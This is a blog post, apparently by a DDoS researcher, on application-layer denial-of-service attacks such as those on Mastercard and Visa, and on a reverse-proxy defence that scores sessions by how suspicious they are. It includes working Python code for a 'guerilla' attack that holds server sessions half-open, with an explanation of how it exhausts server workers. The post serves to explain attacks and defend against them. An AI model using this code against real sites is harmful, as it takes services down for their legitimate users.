Application-layer DDoS claims its latest victims: WikiLeaks, Mastercard and Visa. What can the security community do to stop application-layer DDoS attacks, and the ensuing nuisance for legitimate users of a web site, once and for all?
In the latest episode in the saga of the WikiLeaks-inspired cyber war, the websites of Mastercard and Visa were brought down by an application-layer DDoS attack. You can find more details on how the attack was launched here and here.
I didn’t find it surprising that someone could bring these sites down with fewer than 1,000 user machines whose owners volunteered them as bots. What I did find surprising was that corporations such as Mastercard and Visa do not have sufficient capacity or safeguards in place to protect themselves from such an attack. Even more surprising is that we have known about application-layer DDoS attacks for almost a decade and still keep hearing about how yet another corporation was brought down. The first incident of an application-layer DDoS attack was the CyberSlam operation, in which a TiVo vendor DDoS’ed his competitor’s site. More recently, in 2008, CNN.com was brought down by “hacktivists” allegedly from China – all they had to do was keep their browsers open on a page with an iframe that constantly refreshed cnn.com.
Also surprising is that corporations, enterprise networks and ISPs still don’t have an automated way to detect and prevent DDoS attacks. Every time a DDoS attack occurs, we read about how the IT folks behind that web site had to scramble to change their DNS provider or move to a cloud-based service such as Amazon. What we really need is an automated approach to handling DDoS.
Half a decade ago I wrote my PhD dissertation and two papers (INFOCOM’06, ToN’08) on exactly this topic: how to automatically detect application-layer DDoS attackers and then throttle them at a reverse proxy server that sits in front of the web server tier.
In a nutshell, my thesis examines the various ways someone can launch an application-layer DDoS attack. An attacker can (1) send a lot of requests too fast; (2) launch an asymmetric attack by figuring out the heaviest page or largest image file and fetching it many more times than other pages; or (3) use a personal favorite, and the nastiest to detect, which I named the “guerilla attack”: open a lot of new HTTP/1.1 sessions, send one request per session, and disappear without waiting for the response from the server, i.e. leave the session with the Apache server half-open. Performance tests against a benchmark site showed how much damage such attacks can cause: a site that normally serves, say, 100 concurrent users with response times of 0.1 seconds can easily see legitimate users’ response times climb to 40 seconds (at which point they get annoyed and leave the site) under the most potent attack, which used only 300 clients generating guerilla traffic.
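To make the guerilla pattern concrete, here is a minimal sketch of what one such half-open session looks like on the wire, written as a load-testing helper for a server you own. The function names (`build_request`, `guerilla_session`) are mine, purely for illustration, and this is not code from the dissertation:

```python
import socket

def build_request(host, path="/"):
    """One HTTP/1.1 request that asks the server to keep the session open."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
    )

def guerilla_session(host, port=80, path="/"):
    """Open a session, send a single request, and never read the response."""
    sock = socket.create_connection((host, port), timeout=5)
    sock.sendall(build_request(host, path).encode("ascii"))
    # Deliberately do not read the response or close the connection:
    # from the server's point of view the session is now half-open,
    # and a worker sits idle holding it until a timeout fires.
    return sock  # caller keeps the reference so the socket stays alive
```

The damage comes from the `Connection: keep-alive` header combined with the client vanishing: each abandoned session pins a server-side worker for the full keep-alive timeout, so a few hundred clients repeating this can exhaust a worker pool that comfortably handles thousands of well-behaved requests.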
On the detection front, I proposed assigning a suspicion score to each HTTP/1.1 session on the basis of how well behaved it is. A misbehaving session, one that sends requests faster than normal or generates request distributions that deviate from normal user browsing profiles, is assigned a high suspicion score. A reverse proxy server that keeps track of CPU load and network utilization in the web cluster then schedules incoming sessions according to their suspicion scores: if your session has a low suspicion score, its requests are given higher priority than those of a session with a high one.
Every time I read about a new application-layer DDoS attack, I am inspired to open-source my reverse proxy code. If any of you reading this are interested in helping out, just holler.